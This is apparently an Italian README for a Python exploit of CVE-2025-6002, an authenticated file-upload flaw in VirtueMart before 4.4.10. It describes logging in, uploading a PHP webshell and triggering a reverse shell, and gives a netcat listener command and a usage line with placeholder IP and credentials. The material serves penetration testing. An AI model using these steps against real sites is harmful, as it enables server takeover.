
Exploit Python per CVE-2025-6002 che mira a un upload arbitrario di file autenticato in VirtueMart < 4.4.10. Effettua il login, carica una webshell PHP e attiva una reverse shell per il penetration testing.
Questo script sfrutta la vulnerabilità di caricamento arbitrario di file autenticato in VirtueMart < 4.4.10 (CVE-2025-6002), descritta in questo post del blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days
Questo script effettua il login a VirtueMart con le credenziali fornite, crea un nuovo prodotto e carica una webshell PHP come file multimediale. Quindi invoca una reverse shell all'IP/porta forniti.
Parametri:
Utilizzo:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337